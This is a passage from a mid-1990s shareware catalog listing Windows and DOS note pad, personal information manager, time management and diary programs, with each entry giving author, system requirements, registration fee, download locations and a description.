availability unknown on BBSs; POSTIT30.ZIP on + CompuServe in CIS:WINPROD forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A Windows 3.1 popup note pad for making quick notes. Now has + more of a Windows touch and feel with variable size page and + note size. Includes a speed bar. Does not require the user to + load or store files and is capable of 10 pages with up to 32000 + characters each. This is the computer version of the yellow + sticky notes all over your desk. Many other features. + + + Product: Rolodeck + A Windows based business card file. See full description on + page 129. + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 143. + + Chapter 2, "Utilities" 132 + + + + Product: TC's Toolbox + Ten Windows programs, view files & lots more! See full + description on page 51. + + Product: WinJottr + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 1.0 (04-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk; VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware; discounts on upgrades. 12-month free upgrading + allowed. + Look for: JOTTR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); JOTTR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Different! Designed exclusivesly to streamline your notetaking. + Easy to use; position anywhere - uses less than 10% of an SVGA + screen. Short-cut keys for DateStamp functions and all standard + Windows edit commands. AutoSave and AlwaysOnTop capabilities + make this the ideal desktop companion for the busy computer + user. Searchable, 30k capacity is ideal for holding a month or + more of that important random data. + + + 2.6.8 Personal information managers (PIMs) + + Product: 2DO Personal Task Manager + Author: William Anderson Consulting, 206-828-3675 + Version: 1.2 (06-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Hayes-compatible modem; Mouse; sound card. + Registration fee: $30.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; 2DOV12.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 12 (or contact userID 71662,545 + for assistance). + SWREG#: 1313 + PsL#: 10948 + Download size: 413k (about 31 minutes with a 2400 baud modem) + Description: + A personal task manager for Windows, allowing you to organize, + schedule, and view your To Do List of tasks through a robust + drag and drop interface. Works with tasks, not times, so it + + Chapter 2, "Utilities" 133 + + + + works more the way you do. Windows Sources says it "provides + users with task-management solutions that are unequaled by any + commercial PIM I've seen". Software Creations calls it a + "powerful PIM, with considerable depth, and the interface is + intuitive and user friendly." + + + Product: Above & Beyond + Author: 1Soft Corp., 707-987-0256 + Version: 3.1 (06-09-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $99.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: ABOVE31.ZIP on BBSs (call 707-987-9580 to download it + at no charge); AB.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 12 (or contact userID 71240,1625 for assistance); + AB.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 405 + Download size: 270k (about 20 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, Shareware Industry Awards. + Description: + A powerful Windows PIM for managing your busy schedule. Its + unique dynamic scheduling makes planning your work and staying + organized quick and easy. Daily, weekly and monthly views. + Handles all types of recurring items. Timers, pop-up calendars, + alarms, etc. All completed items are logged. There's a contact + manager for addresses and phone numbers with auto-dialing and + notes space. You can even schedule programs to execute + automatically. Built-in LAN support for group scheduling. + + + Product: Around The House + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 2.02 (06-26-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: ATH202.ZIP on BBSs (call 317-784-2147 to download it at + no charge); ATH.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1594 + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Complete household information manager. Maintain names, + addresses, phone numbers, birthdays, Christmas card lists, etc. + Print mailing labels from database. Track home inventory, + + Chapter 2, "Utilities" 134 + + + + model/serial numbers, location, value. Keep notes, from recipes + to a personal diary. Track auto repair and maintenance. Shows + income, expenses, and "what's left". Many pre-defined reports; + allows user-defined reports. Has an appointment calendar and + basic "word processor" for mail-merge letters. Context- + sensitive help. + + + Product: BusinessCards for Windows + Author: Michael Dvorkin, 415-588-6215 + Version: v2.01 (05-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1k RAM; VGA + monitor. + Registration fee: $19.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + bonus data; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; BCARD*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 73773,2527 + for assistance). + SWREG#: 2483 + PsL#: 11305 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Powerful, compact and easy to use free form database program + for Windows. There are no predefined forms or record layouts - + you decide how to store and present data. Elegant folio like + user interface with tabs and flipping pages. Reads/writes + Windows Cardfile files. Data exchange with most personal + databases Guaranteed to put you into productivity within + minutes! + + + Product: Contact Browser + Contact manger/phone dialer. See full description on page 125. + + Product: Contact-Lens! + Author: Kruse Control Software, 201-670-0677 + Version: 2.3 (04-15-94) + Needs: IBM PC, DOS 3.2 or better. 450k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 135 + + + + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; CL.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 70324,1034 for + assistance). + PsL#: 11026 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + Fast Personal Information Manager (PIM) runs under DOS/Windows, + icon included: 7 screens/contact, 22 search fields, context- + sensitive help windows & online manual, flexible import/export + program. + + + Product: DARN! Don't Forget! + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 4.00 (05-31-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, BBS, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus utilities; bonus data; all + ASP-wide offers (see page 6); discounts on upgrades. + Look for: DARNW40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DARNW40.ZI on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71333,1577 for assistance). + Download size: 463k (about 35 minutes with a 2400 baud modem) + Description: + Did you forget the Boss's birthday? Your Mom's anniversary? + Darn! reminds you of all your important events every day. You + set it for the number of days to look ahead so you'll have + plenty of time to buy gifts and cards. Handles 7 kinds of + events including annual, monthly, bi-monthly, weekly, every- + other-weekly, x day of y month, and appointments. Includes a + special holiday data base and recommends anniversary gifts. + Prints the events list. + + Chapter 2, "Utilities" 136 + + + + Product: Day By Day + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 1.3 (05-05-95) + Needs: IBM PC, DOS 3.3 or better. 4000k RAM; Hard disk; Mouse; + XMS memory; VBRUN300.DLL. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6). Lifetime free upgrading allowed. + Look for: DBD13.ZIP on BBSs; DBD.ZIP on CompuServe in CIS:WINAPD + forum LIBrary 1 (or contact userID 76336,3271 for assistance). + SWREG#: 3923 + PsL#: 11688 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A full featured PIM, including scheduler, task list manager, + and diary sections. All data is password protected. Create + master task list to allow for easy entry of recurring tasks and + default scheduling on a weekly basis. Diary section includes + text search feature, allowing you to view all journal entries + pertaining to specific person, place, event, etc., and allows + for up to 64k of notes per day. Includes full on-line, context + sensitive Windows Help system. + + + Product: DayLog + Author: C & E Associates (Edward J. Panner) + Version: 3.0 (05-30-96) + Needs: IBM PC, DOS 3.1 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse; Epson + printer. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; DAYLOG.ZIP on CompuServe + in ASP:CIS forum LIBrary 0. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A program to list different types of reminders in time and date + order. They may be Onetime, annual, monthly or weekly. Weekly + reminders are updated to same day next week, monthly reminders + to same week & day of next month. Annual reminders to same date + in following year. One time reminders are cancelled when their + date is passed. One displayed reminder and three hidden + reminders are maintained. Reminders are automatically + resequenced. + + Chapter 2, "Utilities" 137 + + + + Product: DayMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 4.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: DAYM410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAYMST.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 79 + Download size: 304k (about 23 minutes with a 2400 baud modem) + Description: + Provides user with trivia, birthdays, anniversaries for a + particular date, and allows user to include their own + information for any date. It also gives a quote for the day, + and informs user of any reminders the user might have entered. + Reminder feature works for weekly/monthly/daily/annual/single + or range of dates basis. All of this can take place at boot up + or any other time user activate the program. The permanent data + file contains over 3000 historical events and 1000 quotes. Also + BBS option. + + + Product: DayMaster For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.10 (12-19-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + + Chapter 2, "Utilities" 138 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. Printed Manual, Disk Of Images. + Look for: DAYMW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAY4W.ZIP on CompuServe in CIS:UNICORN forum + LIBrary 18 (or contact userID 70272,3317 for assistance). + SWREG#: 6767 + Download size: 790k (about 59 minutes with a 2400 baud modem) + Description: + Provides user with trivia, birthdays, anniversaries for a + particular date, and allows user to include their own + information for any date. It also gives a quote for the day, + and informs user of any reminders the user might have entered. + Reminder feature works for weekly/monthly/daily/annual/single + or range of dates basis. All of this can take place at start up + or any other time user activate the program. The permanent data + file contains over 3000 historical events and 1000 quotes. + + + Product: Family Scheduler + Helps keep busy families organized. See full description on + page 120. + + Product: Folders + Author: Target Software (Robert Brinegar), +81-3-3207-4553 + Version: 2.0 (03-22-95) + Needs: IBM AT (80286), Windows 3.1 or better. SVGA monitor; + Hayes-compatible modem; Mouse; VBRUN300.DLL. + Strongly recommended: Network (LAN); XMS memory. + Registration fee: $38.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: FOLDERS.ZIP on BBSs; FOLDERS.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4013 + PsL#: 14097 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A powerful method to keep track of both your personal and + business information. You can keep an unlimited amount of + information(address', personal information, notes, etc.). You + can also connect to your network and send email to your + associates. Comes with image viewer that allows you to view + documents as you talk on the phone. Send faxes with Winfax. + Find you appointments and clients easily with a power search + method. Print out you records and appointments with custom + prints. + + + Product: From Diapers To Diplomas + An electronic 'Baby Book'. See full description on page 556. + + Chapter 2, "Utilities" 139 + + + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 229. + + Product: Infothek Information Manager + Author: Informatik Inc., 610.640.0339 + Version: 1.50 (12-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $49.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; INFOTK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 8 (or contact userID 76534,1166 + for assistance). + SWREG#: 6790 + Download size: 905k (about 67 minutes with a 2400 baud modem) + Description: + Complete Information Manager for business and personal use. + Popular relational database engine. Easy-to-use, intuitive, + powerful SQL-based query method. Databases can be created and + restructured in minutes. Cross-tabs, graphs, reports, labels, + merge, Code39 bar codes, POSTNET, import, export. + + + Product: IPIN PhotoCalendar + Author: Telnet Computer Consultant, 714-651-9931 + Version: 1.5 (12-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Hayes- + compatible modem; Mouse; Epson printer. 256-color monitor or + better. + Strongly recommended: SVGA monitor. + Registration fee: $19.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited CompuServe, mail support; 1-month + limited return policy; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; IPINC15.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 17 (or contact userID 71344,3244 + for assistance). + SWREG#: 5976 + PsL#: 14312 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A great and entertaining way to manage your personal or work + schedule while displaying your favorite graphic images (BMP, + GIF or even JPEG). Create great wall calendars using your love + + Chapter 2, "Utilities" 140 + + + + one's portrait with any Windows 3.1 supported printers. + Features: + * Varieties of calendar display and print out + * Schedule your days work with alarm capability + * Address book with phone dialing capability + * Slide show of your photos Easy setup + + + Product: ListBuilder + Author: Younkin Enterprises, 609-262-1097 + Version: 1.1 (06-27-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse. + Strongly recommended: Modem. + Registration fee: $29.00 + Registration benefits: Full program functionality; 3 months of + unlimited phone, CompuServe, mail support; lifetime return + policy; bonus utilities; bonus data; all ASP-wide offers (see + page 6); discounts on upgrades; registration commissions. + 3-month free upgrading allowed. + Look for: availability unknown on BBSs; LISTBLD1.ZIP on + CompuServe in CIS:WORK forum LIBrary 5 (or contact userID + 72074,1611 for assistance). + SWREG#: 5753 + PsL#: 11994 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Easy-to-use Contact Manager that can be customized to your + "networking" needs. Ready to use, just add your contacts! + Standard features: Demographic info, directions (to home/work), + speed dial, calendar, personalized drop-down boxes, reports & + labels. Special features: customize your lists into catagories + you setup. Also, build a large list of names by "brainstorming" + to associate names / places / occupations with people you know. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 126. + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 334. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 290. + + Chapter 2, "Utilities" 141 + + + + Product: Personal Calendar (PC) + Author: FunStuff Software (Paul Munoz-Colman), 703-435-1110 + Version: 14.95 (01-21-96) + Needs: IBM PC, DOS 3.0 or better. 6k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Operates with DOS 2.1 if not used as a TSR. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $39.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; bonus utilities; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: PCAL1495.ZIP on BBSs (call 703-680-9269 to download it + at no charge); PERCAL.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71141,1224 for assistance). + SWREG#: 280 + PsL#: 10115 + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Friendly Personal Information Manager (PIM) displays a 3-month + scrollable calendar, a running analog/digital clock, a time- + oriented event list of your appointments, and your notes. + Printable for pocket or purse. Keeps a historical diary. + Warnings and alarms tell when events are pending or overdue. + Flexible menu interface, runs under Windows 3 or 95 as normal + program, or also under DOS as a stable environment-sensitive 6K + TSR. + + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 122. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 288. + + Chapter 2, "Utilities" 142 + + + + Product: PSA Cards for Windows 3.1 + Author: PSA Software (William L. Rogers), 970-282-1298 + Version: 2.7 (04-01-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on + upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs; PSACR27.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 72064,1437 + for assistance). + SWREG#: 4619 + PsL#: 14333 + Download size: 1089k (about 81 minutes with a 2400 baud modem) + Description: + A personal information manager that is simple and easy to use. + The user interface is an on-screeen card file with tabs for + dividers and cards. To access a divider or card, just click on + it. Double click a card to edit it. As you add information, + the card expands to accommdate the new information. The + program has a large number of features, yet the user interface + remains simple, uncluttered, and intuitive. + + + Product: PSA Cards for Windows 95/NT + Author: PSA Software (William L. Rogers), 970-282-1298 + Version: 2.7 (04-01-96) + Needs: IBM 80386, Windows 95 or better. 8000k RAM; VGA monitor; + Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on + upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs; PSANT27.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 15 (or contact userID 72064,1437 + for assistance). + SWREG#: 4620 + PsL#: 14333 + Download size: 1143k (about 85 minutes with a 2400 baud modem) + Description: + A personal information manager that is simple and easy to use. + The user interface is an on-screeen card file with tabs for + dividers and cards. To access a divider or card, just click on + it. Double click a card to edit it. As you add information, + the card expands to accommdate the new information. The + program has a large number of features, yet the user interface + remains simple, uncluttered, and intuitive. + + Chapter 2, "Utilities" 143 + + + + Product: SeekWell Universal Query + Author: Informatik Inc., 610.640.0339 + Version: 1.10 (12-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; SEEKWL.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 11 (or contact userID 76534,1166 + for assistance). + SWREG#: 7307 + Download size: 617k (about 46 minutes with a 2400 baud modem) + Description: + Complete Information Manager for business and personal use. + Popular relational database engine. Easy-to-use, intuitive, + powerful SQL-based query method. Databases can be created and + restructured in minutes. Cross-tabs, graphs, reports, labels, + merge, Code39 bar codes, POSTNET, import, export. + + + Product: TC's Personal Data Manager + Author: Specific Applications Software (Timothy W. Carlson), + 612-722-9659 + Version: 1.20 (02-17-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: EGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; PDM120.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 16 (or contact userID 76470,3424 for + assistance). + SWREG#: 4773 + PsL#: 11839 + Download size: 1036k (about 77 minutes with a 2400 baud modem) + Description: + Features full month display of Calendar with special events + that you choose. Phone/Address book to keep your list of phone + numbers, can be sorted by last name or company name. Phone + Dialer dials numbers directly from the phone book using your + modem. Call Timer is provided to time the length of your calls. + To Do Lis helps keep track of important tasks. Note Pad is used + to write notes & edit small text files. Almanac contains + information such as measurement conversions & ZIP codes. + + Chapter 2, "Utilities" 144 + + + + Product: Visual Calendar Planner + Author: Bok Nan Lo + Version: 1.1 (02-10-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $19.95 + Registration benefits: lifetime unlimited CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. 6-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: availability unknown on BBSs. + PsL#: 11042 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + The easiest calendar planner program to use, virtually + negligible learning curve. If you think you cannot handle a + sophisticated PIM, try using this. A powerful, yet extremely + easy to use calendar planner. Guaranteed to put you into + productivity within minutes after using it. Complete and real + 3D look that resembles a desktop planner found on most office + desktop. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 183. + + 2.6.9 Time management + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 133. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 134. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 135. + + Product: DayLog + Maintain & update time and date reminders. See full + description on page 136. + + Product: DELEGATOR for Windows + For those manage or coordinate others. See full description on + page 281. + + Chapter 2, "Utilities" 145 + + + + Product: Early Bird + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0f (03-01-95) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: EBIRD10F.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EBIRD*.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 17 (or contact userID 71532,3271 for assistance). + SWREG#: 4941 + PsL#: 11841 + Download size: 178k (about 13 minutes with a 2400 baud modem) + Description: + A home and business calendar/reminder program that is easy to + use, flexible, and powerful. It features simple or complex + reminder types, desktop calendar and scan modes, color pull- + down and pop-up menus, and context sensitive on-line help. + + + Product: Family Scheduler + Helps keep busy families organized. See full description on + page 120. + + Product: PC-TimeClock + Computer usage time tracking and reporting. See full + description on page 279. + + Product: Personal Calendar (PC) + PIM appointment reminder, clock, calendar TSR. See full + description on page 140. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 122. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 288. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 279. + + Product: Red Hand + Activity recorder, tracks unauthorised useage. See full + description on page 162. + + Chapter 2, "Utilities" 146 + + + + Product: Yellow Sticky for Windows 4.5 + Author: Henning Associates (Michael R. Henning), 804-295-0554 + Version: 4.53 (04-22-96) + Needs: IBM 80386, Windows 3.1 or better. 150k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; runtime license; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; YLWSTK45.ZIP on + CompuServe in CIS:WINPROD forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Not a scheduler or day planner but a program to help you + organize your day and get tasks done that need to be done. + Provides current and next month windows, a "To Do" list for + today and for the scheduled date. When put in the StartUp + group, it lets the user see what needs to be done when his/her + computer is turned on. + + + 2.6.10 Journal/diary programs + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 119. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 135. + + Chapter 2, "Utilities" 147 + + + + Product: Dear Diary + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 3.0 (06-22-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: DIARY30.ZIP on BBSs; DIARY.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 3178 + PsL#: 11664 + Download size: 755k (about 56 minutes with a 2400 baud modem) + Description: + An innovative diary/daily journal program. It allows you to + enter up to 64000 characters of notes per day. Includes text + search feature enabling you to zero in on dates in which you + entered information about specific people, events, etc. + Includes full on-line context sensitive Windows help system. + Data is stored in MS-Access 2.0 format for easy portability to + other applications. Supports international date formats. + + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 546. + + Product: From Diapers To Diplomas + An electronic 'Baby Book'. See full description on page 556. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 229. + + Product: LessonPlanZ + Lesson planning made easy. See full description on page 448. + + Product: LessonPlanZ For Windows + Lesson planning made easy. See full description on page 449. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 557. + + Chapter 2, "Utilities" 148 + + + + Product: OMNIDay + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 4.30 (10-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAY430.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 64 + 